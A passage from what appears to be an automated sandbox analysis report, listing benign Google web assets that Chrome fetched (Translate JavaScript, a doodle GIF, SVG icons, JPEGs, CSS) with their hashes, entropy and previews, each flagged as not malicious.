                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uD1GC,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xuEY0,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var Mu=function(a){_.B.call(this,a)};_.C(Mu,_.B);Mu.prototype.wb=function(){return _.ej(this,1)};Mu.prototype.Yc=function(a){return _.x(this,1,a)};Mu.Ad="f.bo";var Nu=function(){_.Ql.call(this)};_.C(Nu,_.Ql);Nu.prototype.vb=function(){this.UB=!1;doa(this);_.Ql.prototype.vb.call(this)};Nu.prototype.i=function(){eoa(this);if(this.Mq)return foa(this),!1;if(!this.AD)return Ou(this),!0;this.dispatchEvent("p");if(!this.mz)return Ou(this),!0;this.nx?(this.dispatchEvent("r"),Ou(this)):foa(this);return!1};.var goa=function(a){var b=new _.pr(a.cN);null!=a.iA&&b.j.set("authuser",a.iA);return b},foa=function(a){a.Mq=!0;var b=goa(a),c="rt=r&f_uid="+_.oh(a.mz);_.sn(b,(0,_.Kf)(a.j,a),"POST",c)};.Nu.prototype.j=function(a){a=a.target;eoa(this);if(_.vn(a)){this.Gv=0;if(this.nx)this.Mq=!1,this.dispatchEvent("r");else if(this.AD)this.dispatchEvent("s");else{try{var b=_.wn
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):111137
                                                                                                                                                                                                                                                            Entropy (8bit):7.918671597499378
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:/VHmr5Z2oX9nB0o22CYomlnfn5ASqSA/XokWRz:V4Bx22CY7NuSq/rWd
                                                                                                                                                                                                                                                            MD5:6CBFCE836B866D3DF41CA944AEBAA9F9
                                                                                                                                                                                                                                                            SHA1:FDFA012E6F1E1064E636F9F7EC85A655F18DA246
                                                                                                                                                                                                                                                            SHA-256:7747B4FEDB21EC59AA19319F08C5289A86ADEB37FE0B21D4C250EAFA8F37B50D
                                                                                                                                                                                                                                                            SHA-512:486F8457E2BE3D829E0B8B3F7998389500B1A2CCA65C34ADAD67F8AFE1920E8CF19634E738EF26AB6544A42F5A4EB1D7F2521BA69A29622E85ABDA4DE73F3931
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2021/tunisia-national-day-2021-6753651837108892-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89a.................HV.5F..... t...Jd.................................[...........5Pk.......(........r....ltiS[L...........|....l..&5.........Uj...b..................p..y....Yy.......u...........................Wb....al..-Z..............i..y...jt.@Y.......$5.hs...........e.................y.p.......R..........VdS.............(.].....{..s{......Xkj............................................j.............bk_..........d.\...w......!B.cia........~.W...e}.......]............W.........y....\.....................e......!9t..].......n..........|...........................................V..................................................................................................k.......................e..i.....]...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):14171
                                                                                                                                                                                                                                                            Entropy (8bit):4.5751212723122086
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:+xzbtTed93PDg7LKbgx2fvQa0ClHFGnXEGxVbY1NqCwYfiw:+BbtTedhcfKbgx0vQa0ClHknXEGPY1Iw
                                                                                                                                                                                                                                                            MD5:1E4B429549770CEDF96CFCD074FDA539
                                                                                                                                                                                                                                                            SHA1:CA9FD873C2F32CEF2FF071B9C44F0465DD2E42DE
                                                                                                                                                                                                                                                            SHA-256:34A8C0C5D8324D7D4CE7B8D5B182347F6D51DA4B80E16695F9400181B1E73255
                                                                                                                                                                                                                                                            SHA-512:6CCB42AE46C9140705D83DEA7911C635E752F38C7BC139FC7EB6268F82B6862C9057462C60F85596241BB14E4F459AEE0934811E1140FD5F6FECFDE2250249F2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg"><defs><svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41 15 4l-8 8 8 8 1.41-1.41L9.83 12"/></svg><svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59 9 20l8-8-8-8-1.41 1.41L14.17 12"/></svg><svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41 20 15l-8-8-8 8 1.41 1.41L12 9.83"/></svg><svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59 4 9l8 8 8-8-1.41-1.41L12 14.17"/></svg><svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"/></svg><svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"/></svg><svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"/></svg><svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l-5.58-5.59L4 12l8 8 8-8z"/></svg><svg id="arrow-left" viewBox="0 0 24 24"><path d="M1
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):53591
                                                                                                                                                                                                                                                            Entropy (8bit):7.981519963431433
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:+cz4PHT4T9tZNgsswxAM6Av+HHuk17vCIFsSIeZ/tR7F3Vv:+iDT9Dl0CgH/vEqFv
                                                                                                                                                                                                                                                            MD5:ED2B27B5BDF5681F76A7019056A59590
                                                                                                                                                                                                                                                            SHA1:F261DC559F5060D0334D676DF43840855AC9E6BC
                                                                                                                                                                                                                                                            SHA-256:E33DF01413F575EE8E2F1B1381AD85E08740FFE30381F863D40BAC25E0A4D3BF
                                                                                                                                                                                                                                                            SHA-512:35853D09591C8F10668AE6D35C3EA56193E565D33BE3B702B9086ECDFB4F20C30E8AAEBE89DF0DB12D7D0FF3DD955D538BFCE6F58A6389B7EB637D8FFB169753
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................U.........................!..1."AQ..2aq..#B....R...$3b..Sr.....Tc.%CDs...4d......5et.................................;........................!1.."AQa.#2q..3R.....$B..4b..r...............?....}...G.....^<.......k.....y...V..?L..Du.X........w..Y....O..."....G].......&............................E....O...'.@..?...5...0_.96...1.1.......$so.b........_.....&n.........DW.&r....G...P-}X....Z....%(.H...p.......)G...g....Z.....%.(.~X....Z...........z...O.Q....D...#.P.r.....~...VHp..s.q:.........$..,....O.k.b..G.$.Iir..q.....J.ls....6.....a.L...B...._ D'..O._...S.El...............Ts..1.E.~....0N..@...&FVe.......8...Y%...7.Q.Y..G.."..Z..............0.Q_.2J_!.Y>.A!2...c....f..Un.......-.\.....t.......k.._.....S..!.d.l.........,R.B]..8....?...K...V99....O...c.+..o.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2520)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):133972
                                                                                                                                                                                                                                                            Entropy (8bit):5.6007184128099095
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:lXmqgmVEQwreaxUp/JmeHYPa6Kb68O12Ux4qmXmaASCMai+:XrcLE0i+
                                                                                                                                                                                                                                                            MD5:4A0548B3665592E8815CD0AC79B8DECE
                                                                                                                                                                                                                                                            SHA1:2F6811968A8B8C36249ECC607ED809DC5EA5A008
                                                                                                                                                                                                                                                            SHA-256:D0D3F33BC4CB7B4469741366B9372F9EE3DA6903551E7E7405E91DBB0199DE61
                                                                                                                                                                                                                                                            SHA-512:4F3C63F3E31C83C06F2601B8E1E94A0AB1D78BAF424BF85A4A2E00B08479FA8804F85FB222A2F04778B7CB976725C99FC074577C5F78FD42365A9BC9262B6295
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en_US.zBx702B3GfA.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,BVgquf,CHCSlb,COQbmf,E2VjNc,EEDORb,EFQ78c,IZT63,Id96Vc,JE2clc,JNoxi,JPvYpc,K4PcAe,KG2eXe,KUM7Z,L1AAkb,LEikZe,MI6k7c,MJWMce,Mlhmy,MnwvSb,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RAnnUd,RMhBfe,SdcwHb,SpsfSb,TJQ3Ud,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,Ulmmrd,V3dDOb,VwDzFe,WO9ee,XBRlNc,XVMNvd,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bYHiff,byfTOb,duFQFc,fKUV3e,fmklff,gJzDyc,gychg,hB8iWe,hKSk3e,hc6Ubd,i5dxUd,j4UNFc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,mzzZzc,n73qwf,ovKuLd,pKzUve,pjICDe,pw70Gc,rCcCxc,s39S4,soHxf,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDl8vd75v4HDANrmnL9WdUtR2w0E0Q/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=p8L0ob,GSlykd,tjiVBd,gWGePc,Izs65d,Ru0Pgb,QqJ8Gd,ehH0Pd,n391td,N2mfec,glibvb,bD99Db,yi1Dad,I6YDgd,hPAkKe,g8fAWe,YrN4Fb,PJgxJf,G0j0Je,MDB2J,jl0Zdc,s2VbJb,KOuY1b,rPRh8e,GiFjve,AV6dJd,AJZZxc,V8JnLd,UthHZe,NotTJb,pvoWvc,SNtCZb,mmcjze,VETAO,FZTbYc,Qnj3Pe,AKLKy,mNvcvf"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".Mh0NNb{background-color:#323232;bottom:0;box-sizing:border-box;box-shadow:0px 6px 10px 0px rgba(0,0,0,.14),0px 1px 18px 0px rgba(0,0,0,.12),0px 3px 5px -1px rgba(0,0,0,.2);color:#fff;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;flex-direction:column;font-size:14px;left:0;min-height:48px;position:fixed;right:0;transform:translate(0,100%);visibility:hidden;z-index:99999}.M6tHv{-webkit-box-align:center;box-align:center;align-items:center;align-content:center;display:flex;-webkit-box-orient:horizontal;-webkit-box-direction:normal;flex-direction:row;min-height:inherit;padding:0}.aGJE1b{box-flex:1;flex-grow:1;flex-shrink:1;line-height:normal;overflow:hidden;padding:14px 24px;text-overflow:ellipsis;word-break:break-word}.x95qze{align-self:center;color:#eeff41;box-flex:0;flex-grow:0;flex-shrink:0;float:right;text-transform:uppercase;font-weight:500;display:inline-block;cursor:pointer;outline:none;padding:14px 24px}.KYZn9b{background-color:#
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):53591
                                                                                                                                                                                                                                                            Entropy (8bit):7.981519963431433
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:+cz4PHT4T9tZNgsswxAM6Av+HHuk17vCIFsSIeZ/tR7F3Vv:+iDT9Dl0CgH/vEqFv
                                                                                                                                                                                                                                                            MD5:ED2B27B5BDF5681F76A7019056A59590
                                                                                                                                                                                                                                                            SHA1:F261DC559F5060D0334D676DF43840855AC9E6BC
                                                                                                                                                                                                                                                            SHA-256:E33DF01413F575EE8E2F1B1381AD85E08740FFE30381F863D40BAC25E0A4D3BF
                                                                                                                                                                                                                                                            SHA-512:35853D09591C8F10668AE6D35C3EA56193E565D33BE3B702B9086ECDFB4F20C30E8AAEBE89DF0DB12D7D0FF3DD955D538BFCE6F58A6389B7EB637D8FFB169753
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/dd86GfBmU80zX_gBKX8vD3jcolry9sjlvguaakt0t7oc8jZtX3XUUyDMyDSvIhEIobxWhNnjm1DsTU5E6q3I_WoKgfOYLhDzTMF8dm59Kpg0gLhxn8M
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................U.........................!..1."AQ..2aq..#B....R...$3b..Sr.....Tc.%CDs...4d......5et.................................;........................!1.."AQa.#2q..3R.....$B..4b..r...............?....}...G.....^<.......k.....y...V..?L..Du.X........w..Y....O..."....G].......&............................E....O...'.@..?...5...0_.96...1.1.......$so.b........_.....&n.........DW.&r....G...P-}X....Z....%(.H...p.......)G...g....Z.....%.(.~X....Z...........z...O.Q....D...#.P.r.....~...VHp..s.q:.........$..,....O.k.b..G.$.Iir..q.....J.ls....6.....a.L...B...._ D'..O._...S.El...............Ts..1.E.~....0N..@...&FVe.......8...Y%...7.Q.Y..G.."..Z..............0.Q_.2J_!.Y>.A!2...c....f..Un.......-.\.....t.......k.._.....S..!.d.l.........,R.B]..8....?...K...V99....O...c.+..o.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1583)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):143800
                                                                                                                                                                                                                                                            Entropy (8bit):5.5314197505702944
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:cCdVCZoOCpUKRp34e17mcoEfpk1+GlBtLfxX9zlQ5MFScE7FBVApMI20M3Vd6K:clmOCpUaJ4s7mcoExk1+GlBtLfxX9zl+
                                                                                                                                                                                                                                                            MD5:495649BF96B0D66183B310CCAD4E51A6
                                                                                                                                                                                                                                                            SHA1:740076F9C9F66AC3E94E05B35CDA699589E3C0FA
                                                                                                                                                                                                                                                            SHA-256:F47A09CBA21171B2CC49E8968F6DAB55F6DE051C5ED2B08FF2B2B3FC07250BD8
                                                                                                                                                                                                                                                            SHA-512:1EF70DA2139F78B56F46A5F26262DF48C03DCAAA65B71CBBBBCFDEC40BFA79B46ABEC467D7F5EFE139E44681E0C7B99485BC1D859952668CB7EB2DB2FAA0642F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.x3ks5OQMuEM.2019.O/rt=j/m=q_d,q_pc,qmd,qcwid,qapid/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhba,qhbr,qhch,qhga,qhid,qhin,qhlo,qhmn,qhpc,qhpr,qhsf,qhtt/d=1/ed=1/rs=AA2YrTsLMDC5ShDgua5PEfbsQVpNWEqjoQ"
                                                                                                                                                                                                                                                            Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Xj=function(a,b){_.Ca?a[_.Ca]&&(a[_.Ca]&=~b):void 0!==a.Qb&&(a.Qb&=~b)};_.Yj=function(a,b,c,d,e){let f=_.C(a,b,d);Array.isArray(f)||(f=_.gc);const g=_.Ea(f);g&1||_.Ga(f);if(e)g&2||_.Da(f,18),c&1||Object.freeze(f);else{e=!(c&2);const h=g&2;c&1||!h?e&&g&16&&!h&&_.Xj(f,16):(f=_.Ga(Array.prototype.slice.call(f)),_.ic(a,b,f,d))}return f};._.Zj=function(a,b,c,d,e){var f=!!(e&2);a.j||(a.j={});var g=a.j[c],h=_.Yj(a,c,3,void 0,f);if(!g){var l=h;g=[];f=!!(e&2);h=!!(_.Ea(l)&2);const A=l;!f&&h&&(l=Array.prototype.slice.call(l));var q=e|(h?2:0);e=h;let v=0;for(;v<l.length;v++){var p=l[v];var u=b;Array.isArray(p)?(_.Na(p,q),p=new u(p)):p=void 0;void 0!==p&&(e=e||!!(2&_.Ea(p.ua)),g.push(p))}a.j[c]=g;q=_.Ea(l);b=q|33;b=e?b&-9:b|8;q!=b&&(e=l,Object.isFrozen(e)&&(e=Array.prototype.slice.call(e)),_.Fa(e,b),l=e);A!==l&&_.ic(a,c,l);(f||1===d&&h)&&._.Da(g,18);1===d&&Object.freeze(g);return g}if(3===d)return g;f||((f=Object.isFrozen(g),1!==d||f)?
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3722), with no line terminators
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):3722
                                                                                                                                                                                                                                                            Entropy (8bit):4.881358030077843
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:9ijjVEpM5wMrS616J6Kx6yy6g606dkZgZPZTZmTZchd:QRgM5wys4FypT/eZgZPZTZmTZa
                                                                                                                                                                                                                                                            MD5:25D423803559A828634BB1EB5E262B7B
                                                                                                                                                                                                                                                            SHA1:02DD6CC73EA6895D23771C9B6AD9CB78E569305E
                                                                                                                                                                                                                                                            SHA-256:3318840EAF2AD2A3D647890FD5B2DDA0E0F61858FEE5F1D3568F35C93CBBC21F
                                                                                                                                                                                                                                                            SHA-512:E0C5CD8262DFA7D8B90AAAF494A4ABDCC5C18D71040827D8055A04688DF89642955BEE9331E4FEB0CD33431746AF6CC98CD998382BCFFACD98B9CAB51230C75F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/css/home.min.css?cache=02dd6cc
                                                                                                                                                                                                                                                            Preview:._-home-page .modules-lib__mission-statement{height:auto;margin-bottom:0;margin-top:0}._-home-page .modules-lib__mission-statement .modules-lib__mission-statement__headline{margin-top:36px;font-family:"Google Sans",Roboto,Arial,Helvetica,sans-serif;font-size:20px;letter-spacing:normal;line-height:28px;margin-bottom:0}@media (min-width:1024px){._-home-page .modules-lib__mission-statement .modules-lib__mission-statement__headline{margin-top:48px;font-size:28px;line-height:36px}}@media (min-width:1024px) and (min-width:1024px){._-home-page .modules-lib__mission-statement .modules-lib__mission-statement__headline{margin-top:60px}}._-home-page .clickable-tile__link{border:0}._-home-page .clickable-tile__link:hover{background:0 0;border:0}._-home-page .clickable-tile__link:focus{background:0 0;border-radius:4px;-webkit-box-shadow:0 0 0 2px #1a73e8;box-shadow:0 0 0 2px #1a73e8}._-home-page .clickable-tile__link:visited{color:#1a73e8}._-home-page .clickable-tile__body{padding:0}@media (min-wid
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 400
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):160610
                                                                                                                                                                                                                                                            Entropy (8bit):7.931370578246458
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:1YVwQEBCpMQZKP041bVmHaPI8I7lOS5vR7ZNcx9ujOdBYmAmqe8TB:6mYBKP0418NB7lOUlTjKzAmZ8d
                                                                                                                                                                                                                                                            MD5:A228CB279B9AFDDB2973BEC55F5EFE01
                                                                                                                                                                                                                                                            SHA1:9EDEE902536FECD4767EDB2B2DECDDE8CBE0C0F0
                                                                                                                                                                                                                                                            SHA-256:6108494DC1073A262D685A8AC67C65699D8420A55E374A934A3128FCAABFD58F
                                                                                                                                                                                                                                                            SHA-512:A16C44A28ACBC360265ADF20FF213C896E0A0B2AA0BCEE794CBBCD52C796623B8592F35A7C749E1461B98B1D7B1D245E850540B5CE2BB4A140E8423A38CD529F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a.......m..q.....Lt.Dl............`.....T|..Xe...*X.x.....Px..........Y........].....i.....Iq.Aj...Lt..........t.....<f.v.............k)U..4.............@.........Hp........p.Rz... S}.}..................._...........f.....Pw...w......;K......X.....c...........X...(6f..Fo.......|.......V~..........r..........\..i..e.....K....k..p.............e..Nv.[.....z........j..[..a..Ip...V...................Jt.W~.Lr. O....U|.......w..Rz.Cn.Tz....Fn....u.....b......'>h.....Mt.]..}.....m....R|....u.....Fn.Jr...m..........Sv.p..Z...........y.....h......y........p..........5`.........t.............n..l.............................................................................................................................z....................|...........!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):40269
                                                                                                                                                                                                                                                            Entropy (8bit):7.965856048079124
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Pvv4stEFOPWmHdvGEzSWz8HK8BRT8v57+GNrPRMhmaSj4VrOzfWlgftJHGuZ/a:vy4PJ9e7Y8HFBh8v57T9UmaSj2aClgvi
                                                                                                                                                                                                                                                            MD5:29C0769F4443B654C42E38E66241B29A
                                                                                                                                                                                                                                                            SHA1:9626CF6013D971F6A4D37DBED7C249D06F77421C
                                                                                                                                                                                                                                                            SHA-256:21BCD83A19A091CF20A110734102A6997E9FF2DB5242DA831095C9177C4B4544
                                                                                                                                                                                                                                                            SHA-512:9E16F2F9B0340AC52E9C9932800998ADE7408F1E2814FFEA17AFE399CEE131478C75FB0444E55FF291377A8473B588C815A49176F868A45DDC1980C4384ABE37
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/ns1RQ15FvvYxdGQzVgZfBQLSVnr2dO10vjsXSMb6ob9Y8YnH_NwT86CExwRLcJ_pgu-yapMF-ijuKF3eZd51wxCF8feR0U8yU7Zpj9P8nuKgU6HLt7k?=w1440
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ...............................................d..........................!1.."A...Qa2q...#BR...$&3Ubstu.........%45CETr.......Se.....6Dc....d.....................................G........................!1AQ..aq..."2........4BRr....#$CSb..3...5c..U............?........B.J8.X.Sg....9S5..RA.*.{..q...iF..9.......D.....O...W.D&.*L.by..h.0].L*...H..18...m..}y_B..fW53...}.V6.,.f....|p..S.:.q. .UgR..HF.l.....8...si^.igc}S.`.,.}...F.M.S......6.B..$RD.1a..aj..].%}.[.x.j.]...'...VX...G..U.9..$(.6L.(h'..G.&....6...+.....;X.?Y'&.....}......uq"..F.d..w..`.o..&]b.....$c...B9.knoO=..m...R.`...m9.O..>...M.wp....P..!. 1...h.!6.1.@2..Wt...K#.../..G.X.}....#q#.<...]..\.xF7..r.:.x!.....+.H.<....V../{sq5.wb....m..<.~...:.MB...NJ.".w.I.|Hy.....>..5....T.>(.u........F.r...y.....=....4.FQ..-.Gm.^B..q#...$1..$."...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):455
